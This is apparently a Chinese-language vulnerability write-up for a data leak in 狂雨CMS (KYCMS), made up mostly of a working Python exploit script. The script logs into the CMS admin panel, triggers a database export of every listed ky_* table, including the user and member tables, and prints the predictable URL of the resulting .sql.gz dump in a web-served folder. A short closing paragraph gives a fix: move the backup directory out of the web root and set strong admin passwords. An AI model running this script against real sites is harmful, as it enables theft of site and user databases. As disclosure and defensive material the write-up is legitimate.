
狂雨CMS后台数据泄漏漏洞


EXP

# !/usr/bin/python3
# -*- coding:utf-8 -*-
# author: Forthrglory
import requests
import time

def getDatabase(url, username, password):
    """Replay the admin backup-export sequence and return the expected dump URL.

    Logs in to the admin panel on ``url`` with the supplied credentials, asks
    the database-export endpoint to back up the listed ``ky_*`` tables, steps
    through export ids 0-18, and returns the URL under ``/public/database/``
    where a dump named after the local timestamp would be. No response is
    inspected, so the returned URL is an expectation, not a confirmed file.

    Defender notes: the sequence needs a working admin login; the exposure is
    that the resulting ``.sql.gz`` is written to a web-served directory. In
    access logs it appears as requests to ``/admin/database/export.html``
    followed by a GET for ``/public/database/*.sql.gz``.
    """
    http = requests.session()

    # Step 1: authenticate. The session object carries any cookies set here.
    form_headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
    }
    login_form = {
        'username': username,
        'password': password,
        'code': 1,  # presumably the verification-code field -- confirm against the login form
    }
    http.post('http://%s/admin/index/login.html' % (url), login_form, headers=form_headers)

    # Step 2: build the export form. Key order matches the original listing:
    # the checkbox flag first, then tables0 .. tables18.
    table_names = (
        'ky_ad', 'ky_addons', 'ky_bookshelf', 'ky_category', 'ky_collect',
        'ky_comment', 'ky_config', 'ky_crontab', 'ky_link', 'ky_member',
        'ky_menu', 'ky_news', 'ky_novel', 'ky_novel_chapter', 'ky_route',
        'ky_slider', 'ky_template', 'ky_user', 'ky_user_menu',
    )
    export_form = {'layTableCheckbox': 'on'}
    for position, table in enumerate(table_names):
        export_form['tables' + str(position)] = table

    # The backup file name is derived from a timestamp; this one is taken from
    # the local clock just before the export request is sent.
    stamp = time.strftime("%Y%m%d-%H%M%S", time.localtime())

    http.post('http://%s/admin/database/export.html' % (url), data=export_form)

    # Step 3: one GET per export id (0-18), as in the original loop.
    for table_id in range(19):
        http.get('http://%s/admin/database/export.html?id=%s&start=0' % (url, table_id))

    return 'http://' + url + '/public/database/' + stamp + '-1.sql.gz'

if __name__ == '__main__':
    # Sample values from the page: a loopback host and placeholder credentials.
    target_host = '127.0.0.1'
    admin_user, admin_pass = 'admin', 'admin'
    # Print the URL where the backup archive is expected to be.
    print(getDatabase(target_host, admin_user, admin_pass))

运行EXP后,得到备份文件的路径(默认生成路径为 /public/database/,可在后台设置中修改)。

直接访问该路径即可下载备份文件。这说明备份文件位于 Web 可直接访问的目录下;修复时应将备份目录移出 Web 根目录或禁止对该目录的直接访问,并为后台账号设置强口令。
